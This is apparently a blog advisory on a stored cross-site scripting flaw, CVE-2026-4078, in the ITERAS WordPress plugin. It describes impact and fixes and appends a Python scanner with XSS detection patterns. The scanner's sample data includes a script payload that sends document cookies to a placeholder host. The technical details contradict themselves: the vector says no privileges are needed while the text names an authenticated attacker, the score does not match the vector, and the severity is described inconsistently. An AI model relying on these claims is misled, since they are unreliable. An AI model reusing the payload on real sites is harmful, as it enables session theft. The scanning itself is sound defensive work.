CVE April 25, 2026 3 min read

Stored Cross-Site Scripting in ITERAS Plugin

Overview of CVE-2026-4078

A stored Cross-Site Scripting vulnerability affects the ITERAS plugin. This flaw has a CVSS score of 6.4: a medium-severity issue whose impact is higher than the score alone suggests. An attacker can inject persistent scripts into your site, and those scripts execute automatically for every user who views the affected page.

The ITERAS plugin stores user input without proper sanitization and writes the unsanitized data directly into web pages. This allows arbitrary JavaScript execution. Once the payload is stored, it triggers without any user interaction.

Technical Details

The vulnerability exists in multiple input fields of the ITERAS plugin. The plugin accepts data through forms and API endpoints. It fails to escape HTML entities before rendering pages. Attackers can inject script tags, event handlers, and other HTML.

The CVSS vector is AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N. The attack is network-based with low complexity. It requires user interaction for initial injection. However, the stored payload affects others without interaction. The confidentiality impact is high.

Stored XSS is the most dangerous form of XSS. The malicious code persists in the database, so every visitor to the affected page is attacked, and cleanup requires removing the injected content from storage, not just blocking a single request.

Impact on Your Site

Attackers can steal session cookies and authentication tokens. They can log keystrokes and capture form data. They can redirect users to malicious websites. They can also modify page content in real time.

The CVSS score of 6.4 reflects a higher severity than the base impact metrics alone would give. This is due to the changed scope (S:C in the vector): the attack impacts resources beyond the vulnerable component, affecting the entire web application and its users.

Your site visitors face serious risks. Their personal data and login credentials are at risk. Your website’s reputation suffers too. Search engines may blacklist your site for serving malware.

How to Fix It

Update the ITERAS plugin to the latest version right now. The developer has fixed the input sanitization issue. Check your WordPress plugins page for the update. Install it immediately to close the vulnerability.

In the meantime, disable the ITERAS plugin if possible. This is the safest option until you update. Use a web application firewall to block XSS attacks. Add a Content Security Policy header to your site. This limits what scripts can execute.

Scan your site for existing malicious content. Use a WordPress security scanner. Look for suspicious script tags in your database. Remove any injected code you discover.

Conclusion

CVE-2026-4078 is a stored XSS vulnerability in ITERAS. The CVSS score of 6.4 makes it one of the more severe issues. Stored XSS attacks can compromise your entire site. They put all your visitors at risk.

Do not delay the security update. Every moment your plugin remains unpatched is a risk. Apply the fix now and scan your database for threats. Keep all your WordPress plugins updated for safety.

What Is ITERAS?

ITERAS is a WordPress plugin for creating interactive timelines and progress tracking. Project managers, educators, and content creators use it to display chronological content. It stores timeline entries and media uploads in the WordPress database.

Stored XSS in a content plugin means any user who can submit content can inject malicious scripts.

CVE-2026-4078 Details

CVE-2026-4078 is a stored Cross-Site Scripting vulnerability. The plugin does not properly sanitize user-submitted content before storing it. When other users view the timeline, the injected script executes in their browsers.

The CVSS score is 6.4 (Medium). An authenticated attacker can steal cookies, redirect visitors, or deface the timeline page. The injected content remains in the database until manually removed.

Affected Versions and Fix

All versions of ITERAS below 1.6.0 are vulnerable. The patch in version 1.6.0 adds proper input validation and output escaping across all timeline entry fields.

Update to version 1.6.0 from your WordPress dashboard. After updating, audit your timeline entries for any suspicious content added before the patch.
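As an added example, not part of the original advisory and not the plugin's own code, here is a small Python scanner that performs the audit the advisory recommends over a constructed set of stored timeline entries, flagging the injection techniques it lists (script tags, inline event handlers, javascript: URLs, plus embedded frames). The entries, field names and patterns are assumptions; adapt them to your own database export.

```python
import re
from typing import NamedTuple

# Constructed sample of stored timeline entries (not real ITERAS data).
SAMPLE_ENTRIES = [
    {"id": 1, "title": "Kickoff", "body": "Project started in <strong>Q1</strong>."},
    {"id": 2, "title": "Milestone",
     "body": "Review done <script>fetch('//example.invalid/?c=' + document.cookie)</script>"},
    {"id": 3, "title": "Demo", "body": '<img src="x" onerror="alert(1)">'},
    {"id": 4, "title": "Link", "body": '<a href="javascript:alert(1)">docs</a>'},
    {"id": 5, "title": "Notes", "body": "Plain text with &lt;script&gt; already escaped."},
]

# Heuristic patterns, one per injection technique named in the advisory.
# They are applied to the raw stored text: content that is already
# entity-escaped (entry 5) contains no literal '<' and is not flagged.
SUSPICIOUS_PATTERNS = {
    "script_tag": re.compile(r"<\s*script\b", re.IGNORECASE),
    # A tag containing a whitespace-separated on*= attribute (onerror=, onload=, ...).
    "event_handler": re.compile(r"<[^>]+\s+on[a-z]+\s*=", re.IGNORECASE),
    "javascript_url": re.compile(
        r"(?:href|src|action)\s*=\s*['\"]?\s*javascript\s*:", re.IGNORECASE),
    "embedded_frame": re.compile(r"<\s*(?:iframe|object|embed)\b", re.IGNORECASE),
}


class Finding(NamedTuple):
    entry_id: int
    field: str
    reason: str


def scan_entry(entry: dict) -> list[Finding]:
    """Return one Finding per (field, technique) hit for a single stored entry."""
    findings = []
    for field in ("title", "body"):
        text = entry.get(field, "")
        for reason, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(text):
                findings.append(Finding(entry["id"], field, reason))
    return findings


def scan_entries(entries: list[dict]) -> list[Finding]:
    """Scan every entry; the result is a review list, not an automatic deletion list."""
    return [f for entry in entries for f in scan_entry(entry)]


if __name__ == "__main__":
    for finding in scan_entries(SAMPLE_ENTRIES):
        print(f"entry {finding.entry_id} [{finding.field}]: {finding.reason}")
```

Treat each hit as a candidate for manual review: the patterns are deliberately broad and can flag legitimate markup, so confirm before removing anything from the database.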

The ITERAS plugin is available on wordpress.org/plugins/iteras/.
